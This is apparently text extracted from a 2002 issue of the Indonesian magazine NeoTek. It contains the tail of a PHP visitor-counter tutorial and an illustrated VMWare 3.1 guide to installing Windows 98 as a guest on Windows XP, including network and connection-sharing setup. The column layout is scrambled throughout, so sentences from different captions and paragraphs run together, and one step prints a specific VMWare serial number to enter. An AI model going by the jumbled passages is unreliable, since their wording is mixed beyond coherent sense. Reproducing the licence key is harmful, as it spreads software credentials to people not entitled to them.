terhadap file dapat kita lakukan dengan menggunakan fungsi kita ambil adalah menaikkan nilai dari variabel $harian_konter
tulisfile() yang telah kita definisikan sebelumnya. dengan menggunakan operator increment. Sedangkan ke-
Masalah berikutnya adalah menentukan isi dari file harian.db.php mungkinan kedua adalah tanggal hari ini tidak sama dengan
yang akan di-update. File harian.db.php ini dapat dikatakan tanggal yang tertera di file, maka langkah yang kita ambil
unik atau tidak sama dengan file total.db.php, karena dalam file adalah mengembalikan nilai variabel $harian_konter ke 1.
harian.db.php kita menentukan pula tanggal saat data itu ada. Setelah kita dapat menentukan pilihan terhadap nilai variabel
Artinya begitu tanggal berubah, maka total pengunjung harian $harian_konter yang akan diambil selanjutnya kita tinggal
akan kembali lagi ke awal. Sehingga kita perlu mengecek apa- membuat suatu variabel yang akan kita isi dengan string yang
kah tanggal yang tertera di file sama dengan tanggal hari ini? merupakan isi dari file harian.db.php, yaitu dengan format
Pertama kita buat dulu suatu variabel yang kita isi dengan tang- <?#$sekarang#$harian_konter#?>. Selanjutnya proses update
gal hari ini dengan format "ddmmyyyy" dengan mengguna- terhadap file harian.db.php kita lakukan dengan fungsi
kan fungsi built-in date() dengan format "dmY", kita namakan tulisfile(). Sampai di sini selesailah proses terhadap variabel-
variabel $sekarang. Selanjutnya karena ada dua pilihan ekseku- variabel konter.
si yaitu menaikkan nilai konter atau mengembalikan konter ke Langkah terakhir adalah tinggal menuliskan nilai-nilai variabel
nilai awal (dalam hal ini adalah 1) maka kita dapat menggu- konter yang telah diproses atau yang tidak diproses (jika sesi
nakan percabangan if…else untuk menyelesaikan masalah ini. telah ada) dengan menggunakan fungsi print(). Fungsi ini
Kondisi yang kita asumsikan adalah tanggal yang tertera di memiliki fungsi yang hampir sama dengan fungsi echo(), yaitu
file, yaitu yang telah tersimpan dalam variabel $tanggal_konter, menuliskan pada dokumen.
sama dengan tanggal hari ini, yang telah kita simpan juga Referensi:
dalam variabel $sekarang. Ada dua kemungkinan yaitu kondisi www.php.net
terpenuhi atau tidak. Situs resmi PHP. Anda dapat men-download manual PHP.

Daftar Fungsi Baru


Nama Fungsi Syntax Fungsi

Fopen Fopen(namafile, mode) Membuka koneksi terhadap file


Fread Fread(pointer, panjang string) Membaca isi suatu file
Fwrite Fwrite(pointer, string, panjang string) Menuliskan suatu string ke dalam file
Filesize Filesize(nama file) Menghasilkan ukuran file dalam byte
Explode Explode(string pemisah, string) Membagi string berdasarkan string
Strlen Strlen(string) Menghasilkan panjang suatu string
Session_start Session_start() Memulai sesi
Session_register Session_register(var) Meregistrasi suatu variabel sesi
Session_is_registered Session_is_registered(var) Mengcek apakah suatu variabel sesi telah teregistrasi

Iklan VisionNet
17,6 x 9,35 cm

November 2002 NeoTek 45


NeoTutor

VMWARE 3.1
amu yang dapat dipasangkan pada
T sistem operasi NT/2000/XP di
antaraqnya DOS, Windows 3.1, 95,
98, ME, XP itu sendiri, NT, Windows 2000,

INSTALASI MESIN MAYA Linux, FreeBSD, sampai Novell Netware.


Dengan VMWare, anda dapat bereksperi-
men dengan berbagai macam sistem operasi

PADA WINDOWS XP serta berbagai macam distro Linux, langsung


pada Windows XP anda, tanpa harus takut
partisi komputer anda menjadi berantakan.
VMWare tersedia baik untuk Linux maupun Windows. Selain itu, bila memasang sistem operasi
guest yang sama dengan sistem operasi host,
Khusus untuk Windows hanya dapat diinstalasi pada anda pada dasarnya menciptakan suatu
Windows NT/2000/XP. Dengan VMWare, Windows XP anda virtual sandbox, suatu lingkungan terpisah
untuk menginstalasi berbagai program yang
yang merupakan sistem operasi host dapat menyadi wadah mungkin berbahaya seperti Trojan horse,
bagi sistem operasi guest. bereksperimen dengan berbagai macam

Instalasi sistem operasi tamu di bawah sistem operasi tuan rumah.

MEMULAI INSTALASI SEARCH VIRTUAL DISK LAMA INSTALASI SELESAI


1 Apabila CD ROM drive anda menja-
lankan autorun, maka VMWare me-
2 VMWare akan menanyakan apa-
kah anda pernah menginstal
3 Ikuti saja langkah-langkahnya sam-
pai selesai yang akan menghasilkan
minta fitur itu agar di-disable. Se- VMare versi di bawah 3.0 sebab icon VMWare pada desktop. Untuk
waktu instalasi mungkin anda akan ekstensi filename-nya berbeda menjalankan VMWare, komputer
mendapatkan pesan bahwa driver dengan versi 3.0 ke atas. Juga harus di-boot ulang.
yang akan diinstal untuk virtual virtual disk lama yang ditemukan
adapter belum lolos kompatibilitas (apabila ada) akan mengubah
XP. Klik saja Continue Anyway. ekstensi dan statusnya.

PILIHAN INSTALASI OS YANG DIDUKUNG LOKASI INSTALASI


7 Ada tiga opsi instalasi: Typical (pa-
ling lazim), Custom (dengan device
8 VMWare 3.1 mendukung lebih
banyak OS dibandingkan 2.0.3
9 Virtual machine Windows 98 akan
diinstal di direktori khusus (yang
tambahan atau opsi konfigurasi dan sudah mencakup juga dapat anda ubah). Anda ditanya
khusus), dan VMWare Guest OS kit Windows .NET server selain tentang koneksi network yang
(membuat virtual mesin baru dari pelbagai Linux, FreeBSD, Netware, diinginkan. Apabila guest diberi
guest OS yang sudah terpasang). MS-DOS, serta pelbagai macam akses ke dia-lup host ke Internet,
Untuk contoh ini dipilih Typical versi Windows. Pada contoh ini pilih Use network address
dan klik Next untuk melanjutkan. kita pilih Windows 98. translation (NAT).

46 NeoTek November 2002


NeoTutor

virus dan worm generator, exploit,


serta hasil download dari Internet yang
tidak jelas faktor risikonya.
Bagi redaksi NeoTek, VMWare ber-
guna untuk mengambil screen shot
dari suatu proses instalasi, seperti
langkah-langkah instalasi Linux atau-
pun instalasi sistem operasi lain. De-
• Layar pembuka
ngan cara ini, redaksi NeoTek tidak
instalasi VMWare 3.1.
perlu mengambil gambar langkah-
Pada CD NeoTek
langkah instalasi dengan cara mem-
terdapat dua versi
foto langsung ke layar komputer.
VMWare, yaitu
Pada contoh ini kita akan menginstal VMWare 2.0.3 dan
Windows 98 pada VMWare yang VNMWare 3.1 yang
berjalan pada Windows XP. Anda penampilan serta
dapat saja mencoba yang lain. menunya sedikit
berbeda.

PERSIAPAN INSTALASI GUEST DISABLE CD AUDIO SERIAL NUMBER & REGISTRASI


4 Sebelum mulai menjalankan
VMWare untuk menginstal guest
5 Akan tampil jendela dialog CD
Drive Properties, pilih tab
6 Sebelum dapat menjalankan
VMWare, anda diminta memasuk-
operating system, pastikan bahwa Hardware, pilih nama CD ROM kan serial number. Ketikkan:
CD ROM anda selain di-disable drive-nya untuk memunculkan 60N88-8DW44-16H77-32KT4 dan
autorun-nya, juga di-disable fitur jendela dialog untuk CD ROM drive setelah itu anda ditanya apakah
CD Audio-nya. Pada XP klik Start itu. Pilih tab Properties dan akan meregistrasi VMWare anda.
→ My Computer, klik kanan pada pastikan tidak ada centang di CD Pilih saja Register Later.
ikon CD ROM dan pilih Properties. Audio for CD-ROM device.

VIRTUAL MACHINE TERBENTUK BOOT KE CD ROM WINDOWS 98 INSTALASI GUEST OS DIMULAI


10 Virtual machine terbentuk. Di
sini alokasi RAM-nya 64 MB (di
11 Akan tampak virtual machine ini
di-boot dan mengakses CD ROM
12 Selanjutnya langkah-langkah
instalasi akan berjalan seperti
sini host-nya 128 MB) dan drive yang berisi Windows 98 biasa. Di sini ditunjukkan bahwa
dilengkapi dengan virtual hard Installation CD. Klik sekali agar drive C sedang diformat. Jangan
disk, CD ROM, floppy, network keyboard/kursor/mouse masuk ke kaget! Yang diformat adalah drive
adapter, serta USB controller. virtual machine. Untuk keluar dari C virtual, bukan drive C sungguh-
Hidupkan virtual machine ini virtual machine tekan Ctrl-Alt an yang ada di mesin XP anda.
dengan meng-klik Power On. (pada VMWare 2.0.3 berbeda).

November 2002 NeoTek 47


NeoTutor

VMWARE 3.1
ntuk mengikutsertakan virtual
U machine pada LAN, lakukan penge-
setan IP address pada virtual adapter
yang dapat diakses pada Properties dari ikon

OPTIMASI RESOLUSI Network Neighborhood (pada Windows 98).


Untuk menjalankan ICS (internet con-
nection sharing) misalnya, set agar TCP/IP

DAN VIRTUAL LAN yang binding ke VMWare adapter (di


virtual machine) menetapkan IP serta
gateway secara otomatis. Pada Windows
98 ini didapat dengan klik kanan pada ikon
Virtual Machine dalam network akan dikenal sebagai Network Neighborhood, pilih Properties
komputer tersendiri. Anda dapat menginstal Windows 98 dan pilih TCP/IP.
dan Linux misalnya pada VMWare for XP. Kedua mesin Pada mesin host (Windows XP) yang
terhubung ke Internet, aktifkan Internet
maya itu akan terhubung ke host serta komputer lain dalam Connection Sharing, dengan cara Start →
LAN melalui virtual adapter tersendiri. My Network Places lalu pilih View

Mengoptimalkan resolusi dan mengaktifkan virtual LAN

MICROSOFT SCANDISK WINDOWS 98 SETUP INSTAL DI C:\WINDOWS


1 Setelah memformat virtual disk
C, Windows 98 akan menjalan-
2 Akan tampil GUI untuk setup
guest operating system Win-
3 Secara default, Windows 98 akan
diinstal di direktori C:\WINDOWS.
kan scandisk sebelum kemudian dows 98. Klik Continue untuk Tidak usah khawatir. Inipun cuma
masuk ke proses instalasi melanjutkan. virtual folder, jadi tidak akan me-
dengan GUI (graphical user nindih folder instalasi Windows
interface). XP anda.

PRODUCT KEY DAN SETUP SETUP SELESAI INFORMASI INSTALASI


7 Sebelum Windows 98 menyele-
saikan setting untuk hardware
8 Setup selesai dan anda logon ke guest
OS ini. Pada tahap ini resolusi layar
9 Akan tampil jendela dialog yang
menginformasikan bahwa anda
dan software yang ada, anda dan warna yang tersedia mengikuti akan memanfaatkan sepenuhnya
diminta memasukkan Windows VGA standar saja. Untuk memanfaatkan kinerja grafik dan mouse pada
Product Key yang terdapat pada VGA adapter yang ada, klik teks di virtual machine dengan meng-
manual Windows 98 yang anda bagian bawah jendela VMWare: instal VMWare Tools. Klik Install
beli. VMWare Tools is not running. Click untuk instalasi.
on this text to install.

48 NeoTek November 2002


NeoTutor

Network Connection dan klik kanan


pada akses Internet anda dan pilih
Properties, Pilih tab Advanced dan
pada bagian Internet Connection
Sharing klik untuk mengaktifkan
tanda centang pada Allow other
network users to connect through
this computer’s Internet connection • Hasil instalasi
dan klik OK. Anda juga dapat men- Windows 98 sebagai
set Service apa saja yang dapat Guest OS dengan
diberikan pada komputer lain dengan VMWare 3.1 yang
mengklik tombol Settings. Klik OK berjalan pada Host
dan restart mengaktifkan Internet OS Windows XP.
Connection Sharing. Terlihat di sini IE
dijalankan pada
Lakukan sendiri eksperimen network
Guest OS Windows
dengan banyak mesin maya, walau-
98 untuk mengakses
pun komputrer riilnya hanya satu!
situs Web NeoTek.

IDENTIFIKASI KOMPUTER IKUTI LANGKAH-LANGKAHNYA USER INFORMATION


4 Anda akan diminta memasukkan
Computer name, Workgroup, dan
5 Ikuti terus langkah-langkah
instalasi sampai Windows 98 akan
6 Anda akan diminta memasukkan
user information yang akan
Computer description. Sistem ope- di-restart dan mulai menjalankan digunakan untuk logon ke guest
rasi ini akan dikenali pada network Windows 98 untuk pertama kali. operating system ini. Selanjutnya
anda. Jadi bedakan Computer name klik Next untuk melanjutkan.
dengan yang sudah ada. Gunakan
Workgroup yang sama. Di sini
workgroup NeoTek.

INSTALASI DIMULAI TRUE COLOR DAN 800 X 600 NETWORK NEIGHBORHOOD


10 Instalasi akan berjalan secara
otomatis. Apabila karena suatu
11 Klik kanan pada desktop dan
pilih Properties. Terlihat bahwa
12 Pada contoh ini redaksi NeoTek
menggunakan dua komputer
hal tidak berjalan secara otoma- kini virtual monitor anda telah yang terhubung lewat kabel
tis, maka klik icon My Computer mampu menampilkan true color cross-over, tetapi tampak ada tiga
pada desktop dan akan terlihat dan resolusi tinggi. Selanjutnya komputer pada network seder-
adanya virtual disk khusus yang setup network. Jangan sampai hana ini. Dua komputer yang
berisi VMWare Tools. Double bentrok IP address virtual pertama terpasang pada mesin
click virtual disk ini. machine ini dengan mesin lain. yang sama.

Anda mungkin juga menyukai